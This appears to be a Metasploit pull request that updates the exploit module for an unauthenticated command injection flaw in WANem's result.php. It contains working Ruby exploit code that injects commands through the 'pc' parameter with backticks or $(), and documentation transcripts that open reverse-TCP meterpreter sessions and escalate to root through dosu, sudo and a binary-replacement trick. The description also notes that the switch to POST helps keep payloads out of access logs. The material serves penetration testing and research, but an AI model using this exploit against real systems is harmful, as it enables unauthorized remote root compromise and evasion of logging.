### PR TITLE
Update wanem_exec exploit module

### DIFF
--- a/documentation/modules/exploit/linux/http/wanem_exec.md
+++ b/documentation/modules/exploit/linux/http/wanem_exec.md
@@ -1,0 +1,141 @@
+## Description
+
+  This module exploits a command injection vulnerability in the WANalyzer
+  component of WAN Emulator (WANem) versions 2.0 to 3.0 Beta 2. The
+  `result.php` script does not require authentication and calls `shell_exec()`
+  with user supplied data from the `pc` parameter resulting in arbitrary
+  command execution as the `www-data` user.
+
+
+## Vulnerable Application
+
+  [WANem](http://wanem.sourceforge.net/) is a Wide Area Network Emulator, meant to provide a real experience of a Wide Area Network/Internet, during application development / testing over a LAN environment.
+
+  This module has been tested successfully on WANem versions 2.0, 2.3 and 3.0 Beta 2.
+
+  ISOs are available here:
+
+  * https://sourceforge.net/projects/wanem/files/WANem/
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/http/wanem_exec`
+  3. Do: `set RHOST [IP]`
+  4. Do: `set LHOST [IP]`
+  5. Do: `set TARGET [TARGET]`
+  6. Do: `run`
+  7. You should get a session
+
+
+## Scenarios
+
+### WANem 2.0
+  
+  ```
+  msf5 > use exploit/linux/http/wanem_exec 
+  msf5 exploit(linux/http/wanem_exec) > set rhost 172.16.191.180
+  rhost => 172.16.191.180
+  msf5 exploit(linux/http/wanem_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/http/wanem_exec) > check
+  [*] 172.16.191.180:80 The target service is running, but could not be validated.
+  msf5 exploit(linux/http/wanem_exec) > run
+  [*] Exploit running as background job 0.
+  
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Sending stage (857352 bytes) to 172.16.191.180
+  msf5 exploit(linux/http/wanem_exec) > [*] Meterpreter session 1 opened (172.16.191.188:4444 -> 172.16.191.180:40592) at 2018-03-11 08:21:35 -0400
+  
+  msf5 exploit(linux/http/wanem_exec) > 
+  [*] Command Stager progress - 100.00% done (1246/1246 bytes)
+  
+  msf5 exploit(linux/http/wanem_exec) > sessions -i 1
+  [*] Starting interaction with 1...
+  
+  meterpreter > getuid
+  Server username: uid=33, gid=33, euid=33, egid=33
+  meterpreter > shell
+  Process 11490 created.
+  Channel 1 created.
+  /home/perc/dosu /bin/sh
+  id
+  uid=0(root) gid=33(www-data) groups=33(www-data)
+  ^C
+  Terminate channel 1? [y/N]  y
+  meterpreter > 
+  ```
+  
+### WANem 2.3
+  
+  ```
+  msf5 exploit(linux/http/wanem_exec) > set rhost 172.16.191.176
+  rhost => 172.16.191.176
+  msf5 exploit(linux/http/wanem_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/http/wanem_exec) > check
+  [*] 172.16.191.176:80 The target service is running, but could not be validated.
+  msf5 exploit(linux/http/wanem_exec) > run
+  [*] Exploit running as background job 1.
+  
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Sending stage (857352 bytes) to 172.16.191.176
+  msf5 exploit(linux/http/wanem_exec) > [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.176:39300) at 2018-03-11 08:24:07 -0400
+  
+  msf5 exploit(linux/http/wanem_exec) > 
+  [*] Command Stager progress - 100.00% done (1246/1246 bytes)
+  
+  msf5 exploit(linux/http/wanem_exec) > sessions -i 2
+  [*] Starting interaction with 2...
+  
+  meterpreter > getuid
+  Server username: uid=33, gid=33, euid=33, egid=33
+  meterpreter > shell
+  Process 23385 created.
+  Channel 1 created.
+  sudo /bin/sh
+  id
+  uid=0(root) gid=0(root) groups=0(root)
+  ^C
+  Terminate channel 1? [y/N]  y
+  meterpreter > 
+  ```
+  
+  
+### WANem 3.0 Beta 2
+  
+  ```
+  msf5 exploit(linux/http/wanem_exec) > set rhost 172.16.191.177
+  rhost => 172.16.191.177
+  msf5 exploit(linux/http/wanem_exec) > set target 1
+  target => 1
+  msf5 exploit(linux/http/wanem_exec) > check
+  [+] 172.16.191.177:80 The target is vulnerable.
+  msf5 exploit(linux/http/wanem_exec) > run
+  [*] Exploit running as background job 2.
+  
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Sending stage (857352 bytes) to 172.16.191.177
+  msf5 exploit(linux/http/wanem_exec) > [*] Meterpreter session 3 opened (172.16.191.188:4444 -> 172.16.191.177:51022) at 2018-03-11 08:25:31 -0400
+  
+  msf5 exploit(linux/http/wanem_exec) > 
+  [*] Command Stager progress - 100.00% done (1246/1246 bytes)
+  
+  msf5 exploit(linux/http/wanem_exec) > sessions -i 3
+  [*] Starting interaction with 3...
+  
+  meterpreter > getuid
+  Server username: uid=33, gid=33, euid=33, egid=33
+  meterpreter > shell
+  Process 9643 created.
+  Channel 1 created.
+  cp /bin/bash /tmp/bash
+  sudo /bin/mv /tmp/bash /usr/sbin/conntrack
+  sudo /usr/sbin/conntrack
+  id
+  uid=0(root) gid=0(root) groups=0(root)
+  ^C
+  Terminate channel 1? [y/N]  y
+  ```
+

--- a/modules/exploits/linux/http/wanem_exec.rb
+++ b/modules/exploits/linux/http/wanem_exec.rb
@@ -84,17 +84,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    res = execute_cmdstager :linemax => 2_000, :temp => '/tmp'
+    check_status = check
 
-    unless res
-      vprint_error "#{peer} - No reply from server"
-      return
+    unless check_status == CheckCode::Vulnerable || check_status == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end
 
-    unless res.code == 200
-      fail_with Failure::UnexpectedReply, "Server responded with status code #{res.code}"
-    end
-
-    print_good "#{peer} - Payload sent successfully"
+    execute_cmdstager :linemax => 2_000, :temp => '/tmp'
   end
 end

--- a/modules/exploits/linux/http/wanem_exec.rb
+++ b/modules/exploits/linux/http/wanem_exec.rb
@@ -7,103 +7,94 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'WAN Emulator v2.3 Command Execution',
+      'Name'           => 'WAN Emulator WANalyzer Command Execution',
       'Description'    => %q{
-        This module exploits a command execution vulnerability in WAN Emulator
-        version 2.3 which can be abused to allow unauthenticated users to execute
-        arbitrary commands under the context of the 'www-data' user.
-        The 'result.php' script calls shell_exec() with user controlled data
-        from the 'pc' parameter. This module also exploits a command execution
-        vulnerability to gain root privileges. The 'dosu' binary is suid 'root'
-        and vulnerable to command execution in argument one.
+        This module exploits a command injection vulnerability in the WANalyzer
+        component of WAN Emulator (WANem) versions 2.0 to 3.0 Beta 2. The
+        result.php script does not require authentication and calls shell_exec()
+        with user supplied data from the 'pc' parameter resulting in arbitrary
+        command execution as the www-data user.
+
+        This module has been tested successfully on WANem versions 2.0, 2.3
+        and 3.0 Beta 2.
       },
       'License'        => MSF_LICENSE,
-      'Privileged'     => true,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Author'         =>
-        [
-          'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
-        ],
+      'Privileged'     => false,
+      'Platform'       => 'linux', # Knoppix
+      'Arch'           => ARCH_X86,
+      'Author'         => 'Brendan Coles',
       'References'     =>
         [
-          ['OSVDB', '85344'],
-          ['OSVDB', '85345']
+          ['URL', 'https://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/'],
         ],
       'Payload'        =>
         {
-          'Space'       => 1024,
-          'BadChars'    => "\x00\x22\x27",
+          'Space'       => 2_000,
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic netcat netcat-e',
-            }
-        },
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
+          'BadChars'    => "\x00\x22\x27\\",
         },
       'Targets'        =>
         [
-          ['Automatic Targeting', { 'auto' => true }]
+          [ 'WANem 2', { 'CmdStagerFlavor' => [ :echo, :wget ] }],
+          [ 'WANem 3', { 'CmdStagerFlavor' => [ :echo, :bourne, :printf, :wget ] }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Aug 12 2012'
     ))
   end
 
-  def on_new_session(client)
-    client.shell_command_token("/UNIONFS/home/perc/dosu /bin/sh")
+  def execute_command(cmd, opts = {})
+    vprint_status "Sending command: #{cmd}"
+
+    if target.name.eql? 'WANem 2'
+      post = { 'pc' => "`#{cmd}`" }
+    elsif target.name.eql? 'WANem 3'
+      post = { 'pc' => "$(#{cmd})" }
+    end
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/WANem/result.php',
+      'vars_post' => post
+    }, 10)
   end
 
   def check
-    fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
-    data  = "pc=127.0.0.1; "
-    data << Rex::Text.uri_encode("echo #{fingerprint}")
-    data << "%26"
-    vprint_status("Sending check")
+    fingerprint = Rex::Text.rand_text_alphanumeric rand 6..10
+    res = execute_command "echo #{fingerprint}"
 
-    begin
-      res = send_request_cgi({
-        'uri'    => '/WANem/result.php',
-        'method' => 'POST',
-        'data'   => data
-      }, 25)
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      vprint_error("Connection failed")
-      return Exploit::CheckCode::Unknown
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
 
-    if res and res.code == 200 and res.body =~ /#{fingerprint}/
-      return Exploit::CheckCode::Vulnerable
-    else
-      return Exploit::CheckCode::Safe
+    unless res.code == 200 && res.body.include?('WANalyzer')
+      return CheckCode::Safe
     end
+
+    unless res.body.include? fingerprint
+      return CheckCode::Detected
+    end
+
+    CheckCode::Vulnerable
   end
 
   def exploit
-    data  = "pc=127.0.0.1; "
-    data << Rex::Text.uri_encode(payload.raw)
-    data << "%26"
-    print_status("Sending payload (#{payload.raw.length} bytes)")
-    begin
-      res = send_request_cgi({
-        'uri'    => '/WANem/result.php',
-        'method' => 'POST',
-        'data'   => data
-      }, 25)
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("Connection failed")
+    res = execute_cmdstager :linemax => 2_000, :temp => '/tmp'
+
+    unless res
+      vprint_error "#{peer} - No reply from server"
+      return
     end
-    if res and res.code == 200
-      print_good("Payload sent successfully")
-    else
-      print_error("Sending payload failed")
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, "Server responded with status code #{res.code}"
     end
+
+    print_good "#{peer} - Payload sent successfully"
   end
 end


### PR DESCRIPTION
This PR updates the [linux/http/wanem_exec](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/wanem_exec.rb) exploit module; primarily adding documentation, meterpreter cmdstager, and support for WANem 3.x targets.

The original exploit module was written in 2012 and targeted WANem version 2.x. Since then, the developers released version 3.0 Beta and 3.0 Beta 2 in 2013 and 2014 respectively. The new versions patched the exploit (perhaps accidentally) but didn't resolve the underlying issue.

Exploitation methods vary between the 2.x and 3.x branches - largely due to updating the version of the underlying Knoppix operating system in use by the ISO distributions, rather than changes to the code base.


### 3.x Targets

The targets need to be set manually with `set TARGET [0 or 1]` due to differences between the two branches. Adding auto targeting wasn't worth the time investment.

```ruby
          [ 'WANem 2', { 'CmdStagerFlavor' => [ :echo, :wget ] }],
          [ 'WANem 3', { 'CmdStagerFlavor' => [ :echo, :bourne, :printf, :wget ] }]
```


### Payload and Command Stager

Updated to use a command stager, because why not?

In the process, the poor payload URL encoding in the original exploit has been fixed, and the `send_request_cgi` HTTP method has been updated from `GET` to `POST` to decrease the chances of the payload appearing in HTTP access logs.

Due to the change in operating system version and shell, different `cmdstager::flavor`s were tested and known-good flavors are specified for each target, as per above.


### 'Privileged' => false

The original exploit specified `'Privileged' => true` and took advantage of a `dosu` binary which allowed execution of arbitrary commands as `root`. This binary has been removed from the 3.x branch, but there's still half a dozen ways to get `root` from the `www-data` user largely due to a weak `sudo` configuration.

Modifying the exploit to privesc for each target version was not worth the time investment. Instead, I opted to set `'Privileged' => false`, and document the privesc methods in the documentation.

Additionally, it's worth noting that the `dosu` privesc method in the original exploit made use of `client.shell_command_token` in `on_new_session` which would only work for command shell sessions. It would not work for meterpreter sessions, as `dosu` effectively launches a new shell in a similar fashion to `sudo /bin/sh`.


### Documentation

Documentation to keep h00die happy.


### References

The OSVDB references have been removed and the original reference URL reinstated.

The reference URL was erroneously removed from this module a while ago. The script used to clean up dead URLs in module references doesn't take into account instances where the reference URL specified `http` but the URL now redirects to `https` - flagging them as dead.
